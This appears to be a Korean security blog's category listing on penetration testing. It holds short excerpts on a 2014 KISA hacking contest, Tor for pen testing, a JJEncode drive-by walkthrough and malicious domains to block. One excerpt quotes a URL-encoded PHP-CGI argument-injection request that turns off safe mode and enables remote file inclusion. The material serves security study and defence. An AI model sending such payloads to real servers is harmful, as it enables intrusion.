모의해킹 (WAPT)182 제11회 해킹방어대회 개최 한국인터넷진흥원에서는 해킹사고에 대한 대응능력 향상을 위해 다음과 같이 「제11회 해킹방어대회」를 개최합니다. □ 참가대상 및 방법 o 참가대상 : 국내 모든 정보보호 담당자, 화이트해커(1개 팀당 4명 이하로 팀원 구성, 내국인으로 제한) o 참가신청 : 2014. 10. 1(수) 09:00 ~ 2014. 10. 15(수) 18:00까지 홈페이지를 통해 신청(http://hdcon.kisa.or.kr) o 기타 문의처 : hdcon@kisa.or.kr □ 대회 내용 o 개요 - 주최 : 미래창조과학부 - 주관 : 한국인터넷진흥원 - 협찬 : Microsoft, Symantec, CDNetworks o 예선 대회 - 1부 : 2014. 10. 18(토) 10:00 ~ 18:00 (8시간), 온라인 문제풀.. 2014. 9. 30. 쉘코드 웹공격 사례 샘플 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68.. 2014. 9. 4. Tor-nonymous - Using Tor for Pen Testing [Editor's Note: In this article, Chris Crowley provides some really useful tips for using Tor to anonymize your penetration testing. He provides details on strategy and tactics, along with some helpful configuration settings and scripts. His discussion of Privoxy is especially useful. Thanks, Chris! --Ed.]By Chris CrowleyPen testing derives its value from being able to emulate the behavior of re.. 2014. 4. 30. JJEncode Script Leads to Drive-By The use of JJEncode in a drive-by download has been around for a couple of years but has been popping up a lot recently. A couple of readers have asked how to deobfuscate this so here’s a walkthrough with a live script.Here’s an automobile forum that’s been compromised:Viewing the source code, this link kicks off the infection:Then from alnera.eu, you end up getting this strange looking Javascri.. 2014. 4. 8. Injection attack in progress A couple of injection attacks seem to be in progress, I haven't quite got to the bottom of them yet.. but you might want to block the following domains: fsv-hoopte-winsen.de grupocbi.com These are hosted on 82.165.77.21 and 72.47.228.162 respectively. The malware is resistant to automated tools and redirects improperly-formed attempt to analyse it to Bing [1][2]. The malware is appended to hacke.. 2014. 3. 18. 이전 1 ··· 4 5 6 7 8 9 10 ··· 37 다음 728x90